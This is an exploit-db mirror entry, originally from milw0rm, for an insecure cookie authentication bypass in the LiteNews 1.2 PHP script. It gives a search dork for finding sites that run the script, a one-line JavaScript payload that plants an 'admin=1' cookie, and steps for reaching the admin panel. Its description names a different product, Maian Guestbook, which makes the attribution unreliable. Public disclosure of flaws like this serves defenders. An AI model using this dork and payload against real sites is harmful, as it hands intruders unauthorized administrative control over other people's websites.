exploit-db-mirror/exploits/php/webapps/6206.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
2.2 KiB
Text

#########################################################################
# #
# litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability #
# #
#########################################################################
# #
# AUTHOR : Scary-Boys #
# HOME : http://scary-boys.com #
# Download : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
# #
#########################################################################
# #
# DorKs : "Powered By litenews" #
# #
#########################################################################
# #
# DESCRIPTION : #
# Maian Guestbook suffers from a insecure cookie #
# the admin panel only checks if the cookie exists. #
# #
#########################################################################
# #
# Vulnerability : #
# #
# javascript:document.cookie = "admin=1; path=/"; #
# #
#########################################################################
# #
# after running the javascript, Go to "/admin/index.php" & Refresh #
# #
#########################################################################
# milw0rm.com [2008-08-05]